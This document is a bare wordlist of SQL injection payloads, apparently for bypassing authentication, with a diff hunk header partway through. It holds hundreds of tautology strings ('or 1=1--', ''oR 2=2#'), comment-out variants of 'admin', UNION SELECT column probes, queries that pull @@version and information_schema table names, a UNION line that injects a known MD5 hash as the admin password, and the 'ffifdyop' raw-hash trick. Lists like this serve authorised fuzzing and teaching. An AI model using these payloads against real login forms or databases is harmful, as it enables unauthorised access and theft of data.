'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
